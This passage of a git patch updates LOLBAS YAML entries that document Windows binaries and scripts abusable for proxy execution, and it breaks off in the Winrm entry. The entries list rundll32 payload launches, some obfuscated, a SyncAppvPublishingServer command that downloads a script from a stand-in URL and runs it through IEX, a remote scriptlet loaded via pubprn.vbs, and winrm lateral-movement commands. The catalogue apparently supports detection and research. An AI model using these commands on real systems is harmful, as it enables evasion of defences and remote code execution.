From bac3b9e56c3fe7db3ffe0f17c6774c11568f06da Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 26 Sep 2018 11:41:58 +0200 Subject: [PATCH] Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files --- ...webportal.ps1 => MDFromYaml-webportal.ps1} | 4 +- yml/OSBinaries/Cmdkey.yml | 2 +- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 4 +- yml/OSLibraries/Ieframe.yml | 6 +- yml/OSLibraries/Mshtml.yml | 8 +-- yml/OSLibraries/Pcwutl.yml | 6 +- yml/OSLibraries/Setupapi.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 6 +- yml/OSLibraries/Shell32.yml | 12 ++-- yml/OSLibraries/Syssetup.yml | 2 +- yml/OSLibraries/Url.yml | 18 ++--- yml/OSLibraries/Zipfldr.yml | 10 +-- yml/OSScripts/CL_mutexverifiers.yml | 32 ++++++--- yml/OSScripts/Cl_invocation.yml | 34 ++++++---- yml/OSScripts/Manage-bde.yml | 36 +++++++--- yml/OSScripts/Pubprn.yml | 35 ++++++---- yml/OSScripts/Slmgr.yml | 37 ++++++---- yml/OSScripts/Syncappvpublishingserver.yml | 32 ++++++--- yml/OSScripts/Winrm.yml | 68 +++++++++++++------ yml/OSScripts/pester.yml | 35 ++++++---- yml/OtherMSBinaries/Appvlp.yml | 25 ++++--- yml/OtherMSBinaries/Bginfo.yml | 5 +- yml/OtherMSBinaries/Cdb.yml | 19 +++--- yml/OtherMSBinaries/Csi.yml | 17 +++-- yml/OtherMSBinaries/Dnx.yml | 14 ++-- yml/OtherMSBinaries/Dxcap.yml | 15 ++-- yml/OtherMSBinaries/Mftrace.yml | 21 +++--- yml/OtherMSBinaries/Msdeploy.yml | 13 ++-- yml/OtherMSBinaries/Msxsl.yml | 17 +++-- yml/OtherMSBinaries/Rcsi.yml | 12 ++-- yml/OtherMSBinaries/Sqldumper.yml | 17 +++-- yml/OtherMSBinaries/Sqlps.yml | 13 ++-- yml/OtherMSBinaries/Sqltoolsps.yml | 13 ++-- yml/OtherMSBinaries/Te.yml | 14 ++-- yml/OtherMSBinaries/Tracker.yml | 14 ++-- yml/OtherMSBinaries/Vsjitdebugger.yml | 15 ++-- yml/OtherMSBinaries/Winword.yml | 15 ++-- 38 files changed, 405 insertions(+), 245 deletions(-) rename Mgmt-Scripts/{Draft-MDFromYaml-webportal.ps1 => MDFromYaml-webportal.ps1} (99%) diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/MDFromYaml-webportal.ps1 similarity index 99% rename from Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 rename to Mgmt-Scripts/MDFromYaml-webportal.ps1 index e030eb6..fdf8121 100644 --- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 +++ b/Mgmt-Scripts/MDFromYaml-webportal.ps1 @@ -52,7 +52,7 @@ function Convert-YamlToMD if($grp.Category -eq "Upload"){$Uplo += $grp} if($grp.Category -eq "Encode"){$Enco += $grp} if($grp.Category -eq "Decode"){$Deco += $grp} - if($grp.Category -eq "Alternate data streams"){$ADS += $grp} + if($grp.Category -eq "ADS"){$ADS += $grp} if($grp.Category -eq "Copy"){$Copy += $grp} if($grp.Category -eq "Credentials"){$Cred += $grp} if($grp.Category -eq "Compile"){$Comp += $grp} @@ -333,6 +333,8 @@ function Invoke-GenerateMD } #Generate the stuff! +# Remember to delete existing files first or else it will only append... + #Bins Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 41ad530..1df1920 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -18,7 +18,7 @@ Full Path: Code Sample: - Code: Detection: - - IOC: Usage of this command could be and IOC + - IOC: Usage of this command could be an IOC Resources: - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 190c6ad..99a96a3 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,7 +1,7 @@ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5fcad18..317beac 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,7 +1,7 @@ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, @@ -49,7 +49,7 @@ Code Sample: - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct Detection: - - IOC: '' + - IOC: Resources: - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - Link: https://twitter.com/pabraeken/status/991695411902599168 diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 6c8fa19..d30ea52 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -1,13 +1,13 @@ --- Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -18,7 +18,7 @@ Full Path: Code Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - - IOC: '' + - IOC: Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 73a0852..a61b70b 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,13 +1,13 @@ --- Name: Mshtml.dll Description: Microsoft HTML Viewer -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). UseCase: Launch an HTA application. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -16,9 +16,9 @@ Full Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://twitter.com/pabraeken/status/998567549670477824 - Link: https://windows10dll.nirsoft.net/mshtml_dll.html diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index ac12eb0..a1329eb 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,13 +1,13 @@ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe Description: Launch executable by calling the LaunchApplication function. UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -16,7 +16,7 @@ Full Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll Code Sample: - - Code: '' + - Code: Detection: - IOC: Resources: diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 7754852..90939ed 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,7 +1,7 @@ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index a68f07d..16226fd 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,13 +1,13 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -18,7 +18,7 @@ Full Path: Code Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - - IOC: '' + - IOC: Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 2ad1fcc..81f469d 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,13 +1,13 @@ --- Name: Shell32.dll Description: Windows Shell Common Dll -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. UseCase: Load a DLL payload. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -15,14 +15,14 @@ Commands: - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. UseCase: Run an executable payload. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. UseCase: Run an executable payload. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -30,9 +30,9 @@ Full Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://twitter.com/Hexacorn/status/885258886428725250 - Link: https://twitter.com/pabraeken/status/991768766898941953 diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 591708c..a021e4a 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,7 +1,7 @@ --- Name: Syssetup.dll Description: Windows NT System Setup -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index e60a344..4aac63e 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,13 +1,13 @@ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" Description: Launch a HTML application payload by calling OpenURL. UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -15,7 +15,7 @@ Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. UseCase: Load an executable payload by calling a .url file with or without quotes. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -23,7 +23,7 @@ Commands: - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -31,7 +31,7 @@ Commands: - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -39,7 +39,7 @@ Commands: - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -47,7 +47,7 @@ Commands: - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -56,9 +56,9 @@ Full Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/DissectMalware/status/995348436353470465 diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index fe866fd..1fc3bc7 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,13 +1,13 @@ --- Name: Zipfldr.dll Description: Compressed Folder library -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe Description: Launch an executable payload by calling RouteTheCall. UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -15,7 +15,7 @@ Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -24,9 +24,9 @@ Full Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - Link: https://twitter.com/bohops/status/997896811904929792 diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index f8189b7..9b0faea 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,18 +1,28 @@ --- Name: CL_Mutexverifiers.ps1 -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1" + - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 -Code Sample: [] -Detection: [] + - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/995111125447577600 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate) + - Link: https://twitter.com/pabraeken/status/995111125447577600 +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 895c775..4266e6d 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -1,20 +1,30 @@ --- Name: CL_Invocation.ps1 -Description: Execute -Author: '' +Description: Aero diagnostics script +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 -Code Sample: [] -Detection: [] + - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 + - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ - - https://twitter.com/bohops/status/948548812561436672 - - https://twitter.com/pabraeken/status/995107879345704961 -Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths) + - Link: +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index 549d882..fcfd182 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -1,19 +1,37 @@ --- Name: Manage-bde.wsf -Description: Execute -Author: '' +Description: Script for managing BitLocker +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. + Usecase: Proxy execution from script + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. + Usecase: Proxy execution from script + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\manage-bde.wsf -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\manage-bde.wsf +Code Sample: + - Code: +Detection: + - IOC: Manage-bde.wsf should normally not be invoked by a user Resources: - - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - - https://twitter.com/bohops/status/980659399495741441 -Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack) + - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 + - Link: https://twitter.com/bohops/status/980659399495741441 +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Daniel Bohannon + Handle: '@danielbohannon' +--- \ No newline at end of file diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index 07c4ccb..3452ae4 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -1,20 +1,29 @@ --- Name: Pubprn.vbs -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct - Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. + Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs -Code Sample: - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct -Detection: [] + - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs + - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs +Code Sample: + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct +Detection: + - IOC: Resources: - - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ - - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - https://github.com/enigma0x3/windows-operating-system-archaeology -Notes: Thanks to Matt Nelson - @enigma0x3 + - Link: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ + - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - Link: https://github.com/enigma0x3/windows-operating-system-archaeology +Acknowledgement: + - Person: Matt Nelson + Handle: '@enigma0x3' +--- \ No newline at end of file diff --git a/yml/OSScripts/Slmgr.yml b/yml/OSScripts/Slmgr.yml index 1946236..b1ca4bc 100644 --- a/yml/OSScripts/Slmgr.yml +++ b/yml/OSScripts/Slmgr.yml @@ -1,20 +1,31 @@ --- Name: Slmgr.vbs -Description: Execute -Author: '' +Description: Script used to manage windows license activation +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs - Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. + Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - c:\windows\system32\slmgr.vbs - - c:\windows\sysWOW64\slmgr.vbs -Code Sample: - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct -Detection: [] + - Path: C:\Windows\System32\slmgr.vbs + - Path: C:\Windows\SysWOW64\slmgr.vbs +Code Sample: + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg +Detection: + - IOC: Resources: - - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - https://www.youtube.com/watch?v=3gz1QmiMhss -Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee + - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - Link: https://www.youtube.com/watch?v=3gz1QmiMhss +Acknowledgement: + - Person: Matt Nelson + Handle: '@enigma0x3' + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 6183c84..8f19521 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -1,17 +1,29 @@ --- -Name: SyncAppvPublishingServer.vbs -Description: Execute -Author: '' +Name: Syncappvpublishingserver.vbs +Description: Script used related to app-v and publishing server +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Inject PowerShell script code with the provided arguments + Usecase: Use Powershell host invoked from vbs script + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\System32\SyncAppvPublishingServer.vbs -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/monoxgas/status/895045566090010624 - - https://twitter.com/subTee/status/855738126882316288 -Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee + - Link: https://twitter.com/monoxgas/status/895045566090010624 + - Link: https://twitter.com/subTee/status/855738126882316288 +Acknowledgement: + - Person: Nick Landers + Handle: '@monoxgas' + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index d4329dd..e35ab68 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -1,28 +1,54 @@ --- -Name: Winrm.vbs -Description: Execute -Author: '' +Name: winrm.vbs +Description: Script used for manage Windows RM settings +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. - - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 - Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol. - - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 - Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 + - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' + Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\windows\system32\winrm.vbs - - C:\windows\SysWOW64\winrm.vbs -Code Sample: - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct -Detection: [] + - Path: C:\Windows\System32\winrm.vbs + - Path: C:\Windows\SysWOW64\winrm.vbs +Code Sample: + - Code: 